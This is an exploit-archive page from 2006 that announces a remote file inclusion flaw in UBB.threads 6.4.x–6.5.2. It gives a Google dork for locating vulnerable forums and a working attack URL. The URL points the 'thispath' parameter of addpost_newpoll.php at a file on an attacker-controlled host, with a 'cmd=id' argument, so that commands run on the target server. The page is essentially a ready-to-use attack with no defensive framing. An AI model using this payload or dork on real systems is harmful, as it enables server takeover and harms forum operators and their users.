UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
# Published : 2006-05-22
# Author : V4mu
# Previous Title : phpCommunityCalendar <= 4.0.3 Multiple (XSS/SQL) Vulnerabilities
# Next Title : XOOPS <= 2.0.13.2 xoopsOption[nocommon] Remote Exploit

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# www.Syue.com [2006-05-22]